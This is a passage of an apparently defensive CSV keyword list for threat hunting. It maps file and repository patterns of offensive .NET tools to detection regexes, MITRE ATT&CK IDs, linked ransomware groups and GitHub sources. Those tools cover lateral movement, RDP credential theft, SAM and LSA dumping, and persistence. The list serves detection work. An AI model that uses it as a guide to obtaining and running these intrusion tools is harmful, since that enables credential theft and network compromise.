TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11039" "*/SharpMove.exe*",".{0,1000}\/SharpMove\.exe.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","1","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","11040" "*/SharpMove.git*",".{0,1000}\/SharpMove\.git.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","1","N/A","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","11041" "*/SharpNamedPipePTH.exe*",".{0,1000}\/SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11042" "*/SharpNamedPipePTH.exe*",".{0,1000}\/SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11043" "*/SharpNBTScan.git*",".{0,1000}\/SharpNBTScan\.git.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","1","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","11044" "*/SharpNetCheck.exe*",".{0,1000}\/SharpNetCheck\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11045" "*/SharpNoPSExec*",".{0,1000}\/SharpNoPSExec.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - 
TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","11046" "*/SharpNoPSExec.exe*",".{0,1000}\/SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11047" "*/SharpNoPSExec.exe*",".{0,1000}\/SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11048" "*/SharpOXID-Find.exe*",".{0,1000}\/SharpOXID\-Find\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11049" "*/SharpOxidResolver.git*",".{0,1000}\/SharpOxidResolver\.git.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","11050" "*/SharpOxidResolver/releases/download/*",".{0,1000}\/SharpOxidResolver\/releases\/download\/.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","11051" "*/SharpPack.git*",".{0,1000}\/SharpPack\.git.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","11052" "*/SharpPersistSD.dll*",".{0,1000}\/SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - 
TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","11053" "*/SharpPersistSD.git*",".{0,1000}\/SharpPersistSD\.git.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","1","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","11054" "*/sharppick.exe*",".{0,1000}\/sharppick\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","11055" "*/SharpPrinter.exe*",".{0,1000}\/SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11056" "*/SharpPrinter.exe*",".{0,1000}\/SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11057" "*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11058" "*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11059" "*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11060" "*/SharpRDP.exe*",".{0,1000}\/SharpRDP\.exe.{0,1000}","offensive_tool_keyword","SharpRDP","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpRDP","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11061" "*/SharpRDP.git*",".{0,1000}\/SharpRDP\.git.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","11062" "*/SharpRDPHijack*",".{0,1000}\/SharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral 
Movement","https://github.com/bohops/SharpRDPHijack","1","1","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","11063" "*/SharpRDPThief.git*",".{0,1000}\/SharpRDPThief\.git.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","11064" "*/SharpReg.exe*",".{0,1000}\/SharpReg\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11065" "*/SharpReg.exe*",".{0,1000}\/SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11066" "*/SharpRoast.exe*",".{0,1000}\/SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","11067" "*/SharpRODC.git*",".{0,1000}\/SharpRODC\.git.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","1","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","11068" "*/SharpSAMDump.git*",".{0,1000}\/SharpSAMDump\.git.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","1","N/A","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","11069" "*/SharpSC.exe*",".{0,1000}\/SharpSC\.exe.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. 
(included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","1","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","11070" "*/SharpSC.git*",".{0,1000}\/SharpSC\.git.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","1","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","11071" "*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11072" "*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11073" "*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11074" "*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11075" "*/SharpSCCM.git*",".{0,1000}\/SharpSCCM\.git.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","11076" "*/SharpSCCM/releases/download/*",".{0,1000}\/SharpSCCM\/releases\/download\/.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","11077" "*/SharpSCshell.exe*",".{0,1000}\/SharpSCshell\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11078" "*/SharpSearch.exe*",".{0,1000}\/SharpSearch\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - 
TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11079" "*/SharpSearch.exe*",".{0,1000}\/SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11080" "*/SharpSecDump.exe*",".{0,1000}\/SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11081" "*/SharpSecDump.exe*",".{0,1000}\/SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11082" "*/SharpSecDump.git*",".{0,1000}\/SharpSecDump\.git.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","11083" "*/SharpShares.exe*",".{0,1000}\/SharpShares\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11084" "*/SharpShares.exe*",".{0,1000}\/SharpShares\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - 
T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11085" "*/SharpShares.exe*",".{0,1000}\/SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11086" "*/SharpShares.git*",".{0,1000}\/SharpShares\.git.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","11087" "*/SharpShares/Enums*",".{0,1000}\/SharpShares\/Enums.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","11088" "*/SharpShares/releases/download/*",".{0,1000}\/SharpShares\/releases\/download\/.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","1","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","11089" "*/SharpShares-master*",".{0,1000}\/SharpShares\-master.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","11090" "*/SharpShellPipe.git*",".{0,1000}\/SharpShellPipe\.git.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral 